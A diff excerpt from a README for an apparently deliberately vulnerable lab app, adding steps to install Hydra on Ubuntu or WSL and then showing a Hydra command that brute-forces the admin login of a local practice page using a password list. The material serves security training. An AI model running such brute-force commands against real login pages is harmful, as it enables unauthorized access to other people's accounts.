dipaish/DAMN/README.md

      ```

 6. **Use Hydra to Perform the Attack**:

+Note we need to install hydra

+in Ubuntu/debian run the following command
+sudo apt update
+sudo apt install hydra -y

+You can also do it in WSL ubuntu

+sudo apt update
+sudo apt install hydra -y

+Verify Installation

+hydra -h

    - Open a terminal and run the following Hydra command to brute force the login:
      ```bash
      hydra -l admin -P passwords.txt localhost http-post-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^:Login failed"